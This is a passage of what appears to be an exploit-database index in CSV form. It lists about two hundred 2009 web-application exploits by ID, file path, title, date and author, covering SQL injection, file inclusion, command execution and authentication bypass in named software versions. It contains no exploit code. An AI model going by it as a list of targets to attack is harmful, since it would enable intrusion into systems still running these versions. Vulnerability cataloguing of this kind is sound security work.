- Remote Command Execution",2009-01-20,Osirys,php,webapps, -7838,exploits/php/webapps/7838.txt,"Dodo's Quiz Script 1.1 - Local File Inclusion",2009-01-20,Stack,php,webapps, -7840,exploits/php/webapps/7840.pl,"Joomla! Component Com BazaarBuilder Shopping Cart 5.0 - SQL Injection",2009-01-21,XaDoS,php,webapps, -7841,exploits/php/webapps/7841.txt,"Mambo Component SOBI2 RC 2.8.2 - SQL Injection",2009-01-21,"Br1ght D@rk",php,webapps, -7844,exploits/php/webapps/7844.py,"Sad Raven's Click Counter 1.0 - 'passwd.dat' File Disclosure",2009-01-21,Pouya_Server,php,webapps, -7846,exploits/php/webapps/7846.php,"Joomla! Component com_pcchess - Blind SQL Injection",2009-01-21,InjEctOr5,php,webapps, -7847,exploits/php/webapps/7847.txt,"Joomla! Component beamospetition 1.0.12 - SQL Injection / Cross-Site Scripting",2009-01-21,vds_s,php,webapps, -7849,exploits/php/webapps/7849.txt,"OwnRS Blog 1.2 - 'autor.php' SQL Injection",2009-01-22,nuclear,php,webapps, -7850,exploits/asp/webapps/7850.txt,"asp-project 1.0 - Insecure Cookie Method",2009-01-22,"Khashayar Fereidani",asp,webapps, -7851,exploits/php/webapps/7851.php,"Pardal CMS 0.2.0 - Blind SQL Injection",2009-01-22,darkjoker,php,webapps, -7859,exploits/php/webapps/7859.pl,"MemHT Portal 4.0.1 - Remote Code Execution",2009-01-25,StAkeR,php,webapps, -7860,exploits/php/webapps/7860.php,"Mambo Component com_sim 0.8 - Blind SQL Injection",2009-01-25,"Mehmet Ince",php,webapps, -7861,exploits/asp/webapps/7861.txt,"Web-Calendar Lite 1.0 - Authentication Bypass",2009-01-25,ByALBAYX,asp,webapps, -7862,exploits/php/webapps/7862.txt,"Flax Article Manager 1.1 - 'cat_id' SQL Injection",2009-01-25,JIKO,php,webapps, -7863,exploits/php/webapps/7863.txt,"OpenGoo 1.1 - Local File Inclusion",2009-01-25,fuzion,php,webapps, -7864,exploits/php/webapps/7864.py,"EPOLL SYSTEM 3.1 - 'Password.dat' Disclosure",2009-01-25,Pouya_Server,php,webapps, -7866,exploits/php/webapps/7866.txt,"Simple Machines Forum (SMF) 1.1.7 - Cross-Site Request Forgery / Cross-Site Scripting / Package Upload",2009-01-26,Xianur0,php,webapps, -7867,exploits/php/webapps/7867.php,"ITLPoll 2.7 Stable2 - Blind SQL Injection",2009-01-26,fuzion,php,webapps, -7872,exploits/asp/webapps/7872.txt,"E-ShopSystem - Authentication Bypass / SQL Injection",2009-01-26,InjEctOr5,asp,webapps, -7873,exploits/php/webapps/7873.txt,"Script Toko Online 5.01 - SQL Injection",2009-01-26,k1n9k0ng,php,webapps, -7874,exploits/php/webapps/7874.txt,"SHOP-INET 4 - 'grid' SQL Injection",2009-01-26,FeDeReR,php,webapps, -7876,exploits/php/webapps/7876.php,"PHP-CMS 1 - 'Username' Blind SQL Injection",2009-01-26,darkjoker,php,webapps, -7877,exploits/php/webapps/7877.txt,"Wazzum Dating Software - 'userid' SQL Injection",2009-01-26,nuclear,php,webapps, -7878,exploits/php/webapps/7878.txt,"Groone's GLink ORGanizer - 'index.php?cat' SQL Injection",2009-01-26,nuclear,php,webapps, -7879,exploits/php/webapps/7879.pl,"SiteXS CMS 0.1.1 - Local File Inclusion",2009-01-26,darkjoker,php,webapps, -7880,exploits/php/webapps/7880.txt,"ClickAuction - Authentication Bypass",2009-01-26,R3d-D3V!L,php,webapps, -7881,exploits/php/webapps/7881.txt,"Joomla! Component ElearningForce Flash Magazine Deluxe - SQL Injection",2009-01-26,TurkGuvenligi,php,webapps, -7883,exploits/php/webapps/7883.txt,"OpenX 2.6.3 - 'MAX_type' Local File Inclusion",2009-01-26,"Charlie Briggs",php,webapps, -7884,exploits/php/webapps/7884.txt,"Flax Article Manager 1.1 - Remote PHP Script Upload",2009-01-27,S.W.A.T.,php,webapps, -7885,exploits/php/webapps/7885.txt,"Max.Blog 1.0.6 - 'show_post.php' SQL Injection",2009-01-27,"Salvatore Fresta",php,webapps, -7886,exploits/php/webapps/7886.txt,"Pixie CMS 1.0 - Multiple Local File Inclusions",2009-01-27,DSecRG,php,webapps, -7892,exploits/php/webapps/7892.php,"Community CMS 0.4 - 'id' Blind SQL Injection",2009-01-28,darkjoker,php,webapps, -7893,exploits/php/webapps/7893.txt,"gamescript 4.6 - Cross-Site Scripting / SQL Injection / Local File Inclusion",2009-01-28,Encrypt3d.M!nd,php,webapps, -7894,exploits/php/webapps/7894.txt,"Chipmunk Blog - (Authentication Bypass) Add Admin",2009-01-28,x0r,php,webapps, -7895,exploits/php/webapps/7895.txt,"Gazelle CMS 1.0 - 'template' Local File Inclusion",2009-01-28,fuzion,php,webapps, -7896,exploits/php/webapps/7896.php,"Lore 1.5.6 - 'article.php' Blind SQL Injection",2009-01-28,OzX,php,webapps, -7897,exploits/php/webapps/7897.php,"phpList 2.10.x - Remote Code Execution / Local File Inclusion",2009-01-28,mozi,php,webapps, -7898,exploits/php/webapps/7898.txt,"Max.Blog 1.0.6 - 'submit_post.php' SQL Injection",2009-01-28,"Salvatore Fresta",php,webapps, -7899,exploits/php/webapps/7899.txt,"Max.Blog 1.0.6 - 'offline_auth.php' Offline Authentication Bypass",2009-01-28,"Salvatore Fresta",php,webapps, -7900,exploits/php/webapps/7900.txt,"Social Engine 3.06 - 'category_id' SQL Injection",2009-01-28,snakespc,php,webapps, -7901,exploits/php/webapps/7901.py,"SmartSiteCMS 1.0 - Blind SQL Injection",2009-01-28,certaindeath,php,webapps, -7905,exploits/php/webapps/7905.pl,"Personal Site Manager 0.3 - Remote Command Execution",2009-01-29,darkjoker,php,webapps, -7908,exploits/php/webapps/7908.txt,"Star Articles 6.0 - Remote Contents Change",2009-01-29,ByALBAYX,php,webapps, -7909,exploits/php/webapps/7909.txt,"Coppermine Photo Gallery 1.4.19 - Remote File Upload",2009-01-29,"Michael Brooks",php,webapps, -7911,exploits/php/webapps/7911.txt,"GLPI 0.71.3 - Multiple SQL Injections Vulnerabilities",2009-01-29,Zigma,php,webapps, -7916,exploits/php/webapps/7916.txt,"Netartmedia Car Portal 1.0 - Authentication Bypass",2009-01-29,"Mehmet Ince",php,webapps, -7917,exploits/php/webapps/7917.php,"PLE CMS 1.0 Beta 4.2 - Blind SQL Injection",2009-01-29,darkjoker,php,webapps, -7922,exploits/php/webapps/7922.txt,"Pligg CMS 9.9.5 - Cross-Site Request Forgery / Protection Bypass / Captcha Bypass",2009-01-29,"Michael Brooks",php,webapps, -7924,exploits/asp/webapps/7924.txt,"SalesCart - Authentication Bypass",2009-01-30,ByALBAYX,asp,webapps, -7925,exploits/php/webapps/7925.txt,"Revou Twitter Clone - Cross-Site Scripting / SQL Injection",2009-01-30,nuclear,php,webapps, -7927,exploits/php/webapps/7927.txt,"GNUBoard 4.31.04 (09.01.30) - Multiple Local/Remote Vulnerabilities",2009-01-30,make0day,php,webapps, -7930,exploits/php/webapps/7930.txt,"bpautosales 1.0.1 - Cross-Site Scripting / SQL Injection",2009-01-30,"Mehmet Ince",php,webapps, -7931,exploits/php/webapps/7931.txt,"Orca 2.0.2 - 'topic ' Cross-Site Scripting",2009-01-30,J-Hacker,php,webapps, -7932,exploits/php/webapps/7932.txt,"SkaLinks 1.5 - Authentication Bypass",2009-01-30,Dimi4,php,webapps, -7933,exploits/php/webapps/7933.txt,"eVision CMS 2.0 - SQL Injection",2009-01-30,darkjoker,php,webapps, -7936,exploits/php/webapps/7936.txt,"sma-db 0.3.12 - Remote File Inclusion / Cross-Site Scripting",2009-02-02,ahmadbady,php,webapps, -7938,exploits/php/webapps/7938.txt,"Flatnux 2009-01-27 - Cross-Site Scripting / Iframe Injection (PoC)",2009-02-02,"Alfons Luja",php,webapps, -7939,exploits/php/webapps/7939.txt,"AJA Portal 1.2 (Windows) - Local File Inclusion",2009-02-02,ahmadbady,php,webapps, -7940,exploits/php/webapps/7940.txt,"WholeHogSoftware Ware Support - Authentication Bypass",2009-02-02,ByALBAYX,php,webapps, -7941,exploits/php/webapps/7941.txt,"WholeHogSoftware Password Protect - Authentication Bypass",2009-02-02,ByALBAYX,php,webapps, -7944,exploits/php/webapps/7944.php,"phpBLASTER 1.0 RC1 - Blind SQL Injection",2009-02-02,darkjoker,php,webapps, -7945,exploits/php/webapps/7945.php,"CMS Mini 0.2.2 - Remote Command Execution",2009-02-02,darkjoker,php,webapps, -7946,exploits/php/webapps/7946.txt,"sourdough 0.3.5 - Remote File Inclusion",2009-02-02,ahmadbady,php,webapps, -7947,exploits/php/webapps/7947.pl,"eVision CMS 2.0 - Remote Code Execution",2009-02-02,Osirys,php,webapps, -7948,exploits/php/webapps/7948.php,"PHPSlash 0.8.1.1 - Remote Code Execution",2009-02-02,DarkFig,php,webapps, -7949,exploits/php/webapps/7949.rb,"OpenHelpDesk 1.0.100 - 'eval()' Code Execution (Metasploit)",2009-02-02,LSO,php,webapps, -18164,exploits/android/webapps/18164.php,"Google Android - 'content://' URI Multiple Information Disclosure Vulnerabilities",2011-11-28,"Thomas Cannon",android,webapps, -7951,exploits/php/webapps/7951.txt,"WholeHogSoftware Ware Support - Insecure Cookie Handling",2009-02-03,Stack,php,webapps, -7952,exploits/php/webapps/7952.txt,"WholeHogSoftware Password Protect - Insecure Cookie Handling",2009-02-03,Stack,php,webapps, -7953,exploits/php/webapps/7953.txt,"ClickCart 6.0 - Authentication Bypass",2009-02-03,R3d-D3V!L,php,webapps, -7954,exploits/php/webapps/7954.txt,"groone glinks 2.1 - Remote File Inclusion",2009-02-03,"k3vin mitnick",php,webapps, -7955,exploits/php/webapps/7955.txt,"groone's Guestbook 2.0 - Remote File Inclusion",2009-02-03,"k3vin mitnick",php,webapps, -7956,exploits/php/webapps/7956.txt,"Online Grades 3.2.4 - Authentication Bypass",2009-02-03,x0r,php,webapps, -7959,exploits/php/webapps/7959.txt,"Simple Machines Forum (SMF) - 'BBCode' Cookie Stealing",2009-02-03,Xianur0,php,webapps, -7960,exploits/php/webapps/7960.txt,"AJA Modules Rapidshare 1.0.0 - Arbitrary File Upload",2009-02-03,"Hussin X",php,webapps, -7961,exploits/php/webapps/7961.php,"WEBalbum 2.4b - 'id' Blind SQL Injection",2009-02-03,"Mehmet Ince",php,webapps, -7963,exploits/asp/webapps/7963.txt,"MyDesing Sayac 2.0 - Authentication Bypass",2009-02-03,Kacak,asp,webapps, -7964,exploits/php/webapps/7964.txt,"4Site CMS 2.6 - Multiple SQL Injections",2009-02-03,D.Mortalov,php,webapps, -7965,exploits/php/webapps/7965.txt,"Technote 7.2 - Remote File Inclusion",2009-02-03,make0day,php,webapps, -7967,exploits/php/webapps/7967.pl,"TxtBlog 1.0 Alpha - Remote Command Execution",2009-02-03,Osirys,php,webapps, -7968,exploits/php/webapps/7968.php,"DreamPics Photo/Video Gallery - Blind SQL Injection",2009-02-03,"Mehmet Ince",php,webapps, -7969,exploits/php/webapps/7969.txt,"Flatnux 2009-01-27 - Remote File Inclusion",2009-02-03,"Alfons Luja",php,webapps, -7972,exploits/php/webapps/7972.py,"OpenFiler 2.3 - (Authentication Bypass) Remote Password Change",2009-02-03,nonroot,php,webapps, -7976,exploits/php/webapps/7976.txt,"Jaws 0.8.8 - Multiple Local File Inclusions",2009-02-04,fuzion,php,webapps, -7977,exploits/php/webapps/7977.txt,"Syntax Desktop 2.7 - 'synTarget' Local File Inclusion",2009-02-04,ahmadbady,php,webapps, -7978,exploits/php/webapps/7978.txt,"rgboard 4 5p1 (07.07.27) - Multiple Vulnerabilities",2009-02-04,make0day,php,webapps, -7979,exploits/php/webapps/7979.txt,"GRBoard 1.8 - Multiple Remote File Inclusions",2009-02-04,make0day,php,webapps, -7980,exploits/php/webapps/7980.pl,"PHPbbBook 1.3 - 'bbcode.php?l' Local File Inclusion",2009-02-04,Osirys,php,webapps, -7981,exploits/asp/webapps/7981.txt,"Power System Of Article Management 3.0 - File Disclosure / Cross-Site Scripting",2009-02-04,Pouya_Server,asp,webapps, -7982,exploits/asp/webapps/7982.txt,"team 1.x - File Disclosure / Cross-Site Scripting",2009-02-04,Pouya_Server,asp,webapps, -7984,exploits/php/webapps/7984.pl,"YapBB 1.2 - 'forumID' Blind SQL Injection",2009-02-04,darkjoker,php,webapps, -7987,exploits/php/webapps/7987.txt,"gr blog 1.1.4 - Arbitrary File Upload / Authentication Bypass",2009-02-04,JosS,php,webapps, -7991,exploits/asp/webapps/7991.txt,"GR Note 0.94 Beta - (Authentication Bypass) Remote Database Backup",2009-02-04,JosS,asp,webapps, -7992,exploits/php/webapps/7992.txt,"ClearBudget 0.6.1 - Insecure Cookie Handling / Local File Inclusion",2009-02-05,SirGod,php,webapps, -7993,exploits/php/webapps/7993.txt,"Kipper 2.01 - Cross-Site Scripting / Local File Inclusion / File Disclosure",2009-02-05,RoMaNcYxHaCkEr,php,webapps, -7996,exploits/php/webapps/7996.txt,"ClearBudget 0.6.1 - Insecure Database Disclosure",2009-02-05,Room-Hacker,php,webapps, -7997,exploits/php/webapps/7997.html,"txtBB 1.0 RC3 - HTML/JS Injection / Arbitrary Add Admin Privileges",2009-02-05,cOndemned,php,webapps, -7998,exploits/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Arbitrary '.PHP' File Upload",2009-02-06,ByALBAYX,php,webapps, -7999,exploits/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution",2009-02-06,Osirys,php,webapps, -8000,exploits/php/webapps/8000.txt,"Zeroboard4 pl8 (07.12.17) - Multiple Vulnerabilities",2009-02-06,make0day,php,webapps, -8001,exploits/php/webapps/8001.txt,"Mailist 3.0 - Insecure Backup / Local File Inclusion",2009-02-06,SirGod,php,webapps, -8002,exploits/php/webapps/8002.txt,"CafeEngine - 'catid' SQL Injection",2009-02-06,SuNHouSe2,php,webapps, -8003,exploits/php/webapps/8003.pl,"1024 CMS 1.4.4 - Remote Command Execution / Remote File Inclusion",2009-02-06,JosS,php,webapps, -8004,exploits/php/webapps/8004.txt,"SilverNews 2.04 - Authentication Bypass / Local File Inclusion / Remote Code Execution",2009-02-06,x0r,php,webapps, -8005,exploits/php/webapps/8005.txt,"phpYabs 0.1.2 - 'Azione' Remote File Inclusion",2009-02-06,Arka69,php,webapps, -8006,exploits/php/webapps/8006.txt,"Traidnt UP 1.0 - Arbitrary File Upload",2009-02-09,fantastic,php,webapps, -8007,exploits/php/webapps/8007.php,"IF-CMS 2.0 - 'id' Blind SQL Injection",2009-02-09,darkjoker,php,webapps, -8009,exploits/php/webapps/8009.pl,"w3bcms 3.5.0 - Multiple Vulnerabilities",2009-02-09,DNX,php,webapps, -8011,exploits/php/webapps/8011.txt,"BusinessSpace 1.2 - 'id' SQL Injection",2009-02-09,K-159,php,webapps, -8012,exploits/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery - 'entry' SQL Injection",2009-02-09,BackDoor,php,webapps, -8014,exploits/php/webapps/8014.pl,"PHP Director 0.21 - Remote Command Execution",2009-02-09,darkjoker,php,webapps, -8015,exploits/php/webapps/8015.pl,"Hedgehog-CMS 1.21 - Remote Command Execution",2009-02-09,darkjoker,php,webapps, -8016,exploits/php/webapps/8016.txt,"AdaptCMS Lite 1.4 - Cross-Site Scripting / Remote File Inclusion",2009-02-09,RoMaNcYxHaCkEr,php,webapps, -8017,exploits/php/webapps/8017.txt,"SnippetMaster Webpage Editor 2.2.2 - Remote File Inclusion / Cross-Site Scripting",2009-02-09,RoMaNcYxHaCkEr,php,webapps, -8018,exploits/php/webapps/8018.txt,"FlexCMS 2.5 - 'catId' SQL Injection",2009-02-09,MisterRichard,php,webapps, -8019,exploits/php/webapps/8019.txt,"ZeroBoardXE 1.1.5 (09.01.22) - Cross-Site Scripting",2009-02-09,make0day,php,webapps, -8020,exploits/php/webapps/8020.txt,"Yet Another NOCC 0.1.0 - Local File Inclusion",2009-02-09,Kacper,php,webapps, -8025,exploits/php/webapps/8025.txt,"webframe 0.76 - Multiple File Inclusions",2009-02-09,ahmadbady,php,webapps, -8026,exploits/php/webapps/8026.txt,"WB News 2.1.1 - config[installdir] Remote File Inclusion",2009-02-09,ahmadbady,php,webapps, -8027,exploits/php/webapps/8027.txt,"Gaeste 1.6 - 'gastbuch.php' Remote File Disclosure",2009-02-09,bd0rk,php,webapps, -8028,exploits/php/webapps/8028.pl,"Hedgehog-CMS 1.21 - Local File Inclusion / Remote Command Execution",2009-02-09,Osirys,php,webapps, -8029,exploits/php/webapps/8029.txt,"Thyme 1.3 - 'export_to' Local File Inclusion",2009-02-10,cheverok,php,webapps, -8030,exploits/php/webapps/8030.txt,"Papoo CMS 3.x - 'pfadhier' Local File Inclusion",2009-02-10,SirGod,php,webapps, -8031,exploits/php/webapps/8031.pph,"Q-News 2.0 - Remote Command Execution",2009-02-10,Fireshot,php,webapps, -8032,exploits/php/webapps/8032.txt,"Potato News 1.0.0 - Local File Inclusion",2009-02-10,x0r,php,webapps, -8033,exploits/php/webapps/8033.txt,"AuthPhp 1.0 - Authentication Bypass",2009-02-10,x0r,php,webapps, -8034,exploits/php/webapps/8034.txt,"Mynews 0.10 - Authentication Bypass",2009-02-10,x0r,php,webapps, -8035,exploits/php/webapps/8035.txt,"BlueBird Pre-Release - Authentication Bypass",2009-02-10,x0r,php,webapps, -8036,exploits/php/webapps/8036.pl,"Fluorine CMS 0.1 rc 1 - File Disclosure / SQL Injection / Command Execution",2009-02-10,Osirys,php,webapps, -8038,exploits/php/webapps/8038.py,"TYPO3 < 4.0.12/4.1.10/4.2.6 - 'jumpUrl' Remote File Disclosure",2009-02-10,Lolek,php,webapps, -8039,exploits/php/webapps/8039.txt,"SkaDate Online 7 - Arbitrary File Upload",2009-02-11,ZoRLu,php,webapps, -8040,exploits/php/webapps/8040.txt,"Graugon Gallery 1.0 - Cross-Site Scripting / SQL Injection / Cookie Bypass",2009-02-11,x0r,php,webapps, -8042,exploits/php/webapps/8042.txt,"dacio's CMS 1.08 - Cross-Site Scripting / SQL Injection / File Disclosure",2009-02-11,"Mehmet Ince",php,webapps, -8043,exploits/php/webapps/8043.pl,"Bloggeruniverse 2.0 Beta - 'id' SQL Injection",2009-02-11,Osirys,php,webapps, -8044,exploits/php/webapps/8044.txt,"Den Dating 9.01 - 'txtlookgender' SQL Injection",2009-02-11,nuclear,php,webapps, -8045,exploits/php/webapps/8045.pl,"InselPhoto 1.1 - 'query' SQL Injection",2009-02-11,Osirys,php,webapps, -8046,exploits/php/webapps/8046.txt,"PHP Krazy Image Host Script 1.01 - 'id' SQL Injection",2009-02-12,x0r,php,webapps, -8047,exploits/php/webapps/8047.txt,"Free Joke Script 1.0 - Authentication Bypass",2009-02-12,Muhacir,php,webapps, -8048,exploits/asp/webapps/8048.txt,"Baran CMS 1.0 - 'Arbitrary '.ASP' File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation",2009-02-12,"Aria-Security Team",asp,webapps, -8049,exploits/php/webapps/8049.txt,"ideacart 0.02 - Local File Inclusion / SQL Injection",2009-02-13,nuclear,php,webapps, -8050,exploits/php/webapps/8050.txt,"Vlinks 1.1.6 - 'id' SQL Injection",2009-02-13,JIKO,php,webapps, -8052,exploits/php/webapps/8052.pl,"ea-gBook 0.1 - Remote Command Execution / Remote File Inclusion",2009-02-13,bd0rk,php,webapps, -8053,exploits/php/webapps/8053.pl,"BlogWrite 0.91 - Remote File Disclosure / SQL Injection",2009-02-13,Osirys,php,webapps, -8054,exploits/php/webapps/8054.pl,"CmsFaethon 2.2.0 - 'item' SQL Injection",2009-02-13,Osirys,php,webapps, -8057,exploits/php/webapps/8057.txt,"InselPhoto 1.1 - Cross-Site Scripting",2009-02-16,rAWjAW,php,webapps, -8060,exploits/php/webapps/8060.php,"Falt4 CMS RC4 - 'FCKeditor' Arbitrary File Upload",2009-02-16,Sp3shial,php,webapps, -8061,exploits/php/webapps/8061.pl,"simplePms CMS 0.1.4 - Local File Inclusion / Remote Command Execution",2009-02-16,Osirys,php,webapps, -8062,exploits/php/webapps/8062.txt,"powermovielist 0.14b - SQL Injection / Cross-Site Scripting",2009-02-16,brain[pillow],php,webapps, -8063,exploits/php/webapps/8063.txt,"Novaboard 1.0.0 - Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps, -8064,exploits/php/webapps/8064.pl,"MemHT Portal 4.0.1 - Delete All Private Messages",2009-02-16,StAkeR,php,webapps, -8065,exploits/asp/webapps/8065.txt,"SAS Hotel Management System - 'id' SQL Injection",2009-02-16,Darkb0x,asp,webapps, -8066,exploits/php/webapps/8066.txt,"YACS CMS 8.11 - 'update_trailer.php' Remote File Inclusion",2009-02-16,ahmadbady,php,webapps, -8068,exploits/php/webapps/8068.txt,"ravennuke 2.3.0 - Multiple Vulnerabilities",2009-02-16,waraxe,php,webapps, -8069,exploits/php/webapps/8069.txt,"Grestul 1.x - Cookie Authentication Bypass",2009-02-16,x0r,php,webapps, -8070,exploits/asp/webapps/8070.txt,"SAS Hotel Management System - Arbitrary File Upload",2009-02-17,ZoRLu,asp,webapps, -8071,exploits/php/webapps/8071.txt,"S-CMS 1.1 Stable - Insecure Cookie Handling / Mass Page Delete",2009-02-17,x0r,php,webapps, -8072,exploits/php/webapps/8072.txt,"pHNews Alpha 1 - 'mod' SQL Injection",2009-02-17,x0r,php,webapps, -8073,exploits/php/webapps/8073.txt,"pHNews Alpha 1 - 'genbackup.php' Database Disclosure",2009-02-17,x0r,php,webapps, -8075,exploits/php/webapps/8075.pl,"Firepack - '/admin/ref.php' Remote Code Execution",2009-02-18,Lidloses_Auge,php,webapps, -8076,exploits/php/webapps/8076.txt,"smNews 1.0 - Authentication Bypass / Column Truncation",2009-02-18,x0r,php,webapps, -8083,exploits/php/webapps/8083.txt,"phpBB 3 - 'autopost bot mod 0.1.3' Remote File Inclusion",2009-02-20,Kacper,php,webapps, -8085,exploits/cgi/webapps/8085.txt,"i-dreams Mailer 1.2 Final - 'admin.dat' File Disclosure",2009-02-20,Pouya_Server,cgi,webapps, -8086,exploits/cgi/webapps/8086.txt,"i-dreams GB 5.4 Final - 'admin.dat' File Disclosure",2009-02-20,Pouya_Server,cgi,webapps, -8087,exploits/cgi/webapps/8087.txt,"i-dreams GB Server - 'admin.dat' File Disclosure",2009-02-20,Pouya_Server,cgi,webapps, -8088,exploits/php/webapps/8088.txt,"Osmodia Bulletin Board 1.x - 'admin.txt' File Disclosure",2009-02-20,Pouya_Server,php,webapps, -8089,exploits/php/webapps/8089.pl,"Graugon Forum 1 - 'id' Command Injection / SQL Injection",2009-02-20,Osirys,php,webapps, -8092,exploits/php/webapps/8092.txt,"zFeeder 1.6 - 'admin.php' Unauthenticated Admin Bypass",2009-02-23,ahmadbady,php,webapps, -8093,exploits/php/webapps/8093.pl,"pPIM 1.01 - 'notes.php' Remote Command Execution",2009-02-23,JosS,php,webapps, -8094,exploits/php/webapps/8094.pl,"Free Arcade Script 1.0 - Local File Inclusion Command Execution",2009-02-23,Osirys,php,webapps, -8095,exploits/php/webapps/8095.pl,"Pyrophobia 2.1.3.1 - Local File Inclusion Command Execution",2009-02-23,Osirys,php,webapps, -8098,exploits/php/webapps/8098.txt,"taifajobs 1.0 - 'jobid' SQL Injection",2009-02-23,K-159,php,webapps, -8100,exploits/php/webapps/8100.pl,"MDPro Module My_eGallery - 'pid' SQL Injection",2009-02-23,StAkeR,php,webapps, -8101,exploits/php/webapps/8101.txt,"XGuestBook 2.0 - Authentication Bypass",2009-02-24,Fireshot,php,webapps, -8104,exploits/php/webapps/8104.txt,"Qwerty CMS - 'id' SQL Injection",2009-02-24,b3,php,webapps, -8105,exploits/php/webapps/8105.txt,"pPIM 1.0 - Multiple Vulnerabilities",2009-02-25,"Justin Keane",php,webapps, -8107,exploits/asp/webapps/8107.txt,"PenPal 2.0 - Authentication Bypass",2009-02-25,ByALBAYX,asp,webapps, -8109,exploits/asp/webapps/8109.txt,"SkyPortal Classifieds System 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps, -8110,exploits/asp/webapps/8110.txt,"SkyPortal Picture Manager 0.11 - Contents Change",2009-02-25,ByALBAYX,asp,webapps, -8111,exploits/asp/webapps/8111.txt,"SkyPortal WebLinks 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps, -8112,exploits/php/webapps/8112.txt,"Golabi CMS 1.0 - Remote File Inclusion",2009-02-26,CrazyAngel,php,webapps, -8113,exploits/asp/webapps/8113.txt,"DesignerfreeSolutions NewsLetter Manager Pro - Authentication Bypass",2009-02-26,ByALBAYX,asp,webapps, -8114,exploits/php/webapps/8114.txt,"Coppermine Photo Gallery 1.4.20 - BBCode IMG Privilege Escalation",2009-02-26,StAkeR,php,webapps, -8115,exploits/php/webapps/8115.pl,"Coppermine Photo Gallery 1.4.20 - 'IMG' Privilege Escalation",2009-02-26,Inphex,php,webapps, -8116,exploits/php/webapps/8116.txt,"BannerManager 0.81 - Authentication Bypass",2009-02-26,rootzig,php,webapps, -8120,exploits/asp/webapps/8120.txt,"SkyPortal Downloads Manager 1.1 - Remote Contents Change",2009-02-27,ByALBAYX,asp,webapps, -8123,exploits/php/webapps/8123.txt,"irokez blog 0.7.3.2 - Cross-Site Scripting / Remote File Inclusion / Blind SQL Injection",2009-02-27,Corwin,php,webapps, -8124,exploits/php/webapps/8124.txt,"Demium CMS 0.2.1b - Multiple Vulnerabilities",2009-02-27,Osirys,php,webapps, -8127,exploits/php/webapps/8127.txt,"Blogman 0.45 - Multiple Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps, -8128,exploits/php/webapps/8128.txt,"EZ-Blog beta1 - Delete All Posts / SQL Injection",2009-03-02,"Salvatore Fresta",php,webapps, -8130,exploits/asp/webapps/8130.txt,"Document Library 1.0.1 - Arbitrary Change Admin",2009-03-02,ByALBAYX,asp,webapps, -8131,exploits/asp/webapps/8131.txt,"Digital Interchange Calendar 5.7.13 - Contents Change",2009-03-02,ByALBAYX,asp,webapps, -8132,exploits/asp/webapps/8132.txt,"Access2asp - 'imageLibrar' Arbitrary File Upload",2009-03-02,mr.al7rbi,asp,webapps, -8133,exploits/php/webapps/8133.txt,"Graugon PHP Article Publisher 1.0 - SQL Injection / Cookie Handling",2009-03-02,x0r,php,webapps, -8134,exploits/php/webapps/8134.php,"Joomla! Component com_digistore - 'pid' Blind SQL Injection",2009-03-02,InjEctOr5,php,webapps, -8136,exploits/php/webapps/8136.txt,"Joomla! / Mambo Component eXtplorer - Code Execution",2009-03-02,"Juan Galiana Lara",php,webapps, -8139,exploits/php/webapps/8139.txt,"ritsblog 0.4.2 - Authentication Bypass / Cross-Site Scripting",2009-03-02,"Salvatore Fresta",php,webapps, -8140,exploits/php/webapps/8140.txt,"Zabbix 1.6.2 Frontend - Multiple Vulnerabilities",2009-03-03,USH,php,webapps, -8141,exploits/php/webapps/8141.txt,"blindblog 1.3.1 - SQL Injection / Authentication Bypass / Local File Inclusion",2009-03-03,"Salvatore Fresta",php,webapps, -8145,exploits/php/webapps/8145.txt,"tghostscripter Amazon Shop - Cross-Site Scripting / Directory Traversal / Remote File Inclusion",2009-03-03,d3b4g,php,webapps, -8150,exploits/php/webapps/8150.txt,"Novaboard 1.0.1 - Cross-Site Scripting",2009-03-03,Pepelux,php,webapps, -8151,exploits/php/webapps/8151.txt,"Jogjacamp JProfile Gold - 'id_news' SQL Injection",2009-03-03,kecemplungkalen,php,webapps, -8161,exploits/php/webapps/8161.txt,"celerbb 0.0.2 - Multiple Vulnerabilities",2009-03-05,"Salvatore Fresta",php,webapps, -8164,exploits/php/webapps/8164.php,"Joomla! Component com_iJoomla_archive - Blind SQL Injection",2009-03-05,Stack,php,webapps, -8165,exploits/php/webapps/8165.txt,"Blue Eye CMS 1.0.0 - Remote Cookie SQL Injection",2009-03-06,ka0x,php,webapps, -8166,exploits/php/webapps/8166.txt,"Wili-CMS 0.4.0 - Local File Inclusion / Remote File Inclusion / Authentication Bypass",2009-03-06,"Salvatore Fresta",php,webapps, -8167,exploits/php/webapps/8167.txt,"isiAJAX 1 - 'praises.php?id' SQL Injection",2009-03-06,dun,php,webapps, -8168,exploits/php/webapps/8168.txt,"OneOrZero Helpdesk 1.6.5.7 - Local File Inclusion",2009-03-06,dun,php,webapps, -8170,exploits/php/webapps/8170.txt,"nForum 1.5 - Multiple SQL Injections",2009-03-09,"Salvatore Fresta",php,webapps, -8172,exploits/php/webapps/8172.txt,"cms s.builder 3.7 - Remote File Inclusion",2009-03-09,cr0w,php,webapps, -8181,exploits/php/webapps/8181.c,"PHP Director 0.21 - SQL Into Outfile 'eval()' Injection",2009-03-09,StAkeR,php,webapps, -8182,exploits/php/webapps/8182.txt,"PHPRecipeBook 2.24 - 'base_id' SQL Injection",2009-03-09,d3b4g,php,webapps, -8183,exploits/php/webapps/8183.txt,"woltlab burning board 3.0.x - Multiple Vulnerabilities",2009-03-09,StAkeR,php,webapps, -8184,exploits/php/webapps/8184.txt,"CS-Cart 2.0.0 Beta 3 - 'Product_ID' SQL Injection",2009-03-09,netsoul,php,webapps, -8185,exploits/php/webapps/8185.txt,"phpCommunity 2.1.8 - SQL Injection / Directory Traversal / Cross-Site Scripting",2009-03-09,"Salvatore Fresta",php,webapps, -8186,exploits/php/webapps/8186.txt,"PHP-Fusion Mod Book Panel - 'bookid' SQL Injection",2009-03-09,elusiven,php,webapps, -8188,exploits/php/webapps/8188.txt,"CMS WEBjump! - Multiple SQL Injections",2009-03-10,M3NW5,php,webapps, -8194,exploits/php/webapps/8194.txt,"PHP-Fusion Mod Book Panel - 'course_id' SQL Injection",2009-03-10,SuB-ZeRo,php,webapps, -8195,exploits/php/webapps/8195.txt,"WeBid 0.7.3 RC9 - Multiple Remote File Inclusions",2009-03-10,K-159,php,webapps, 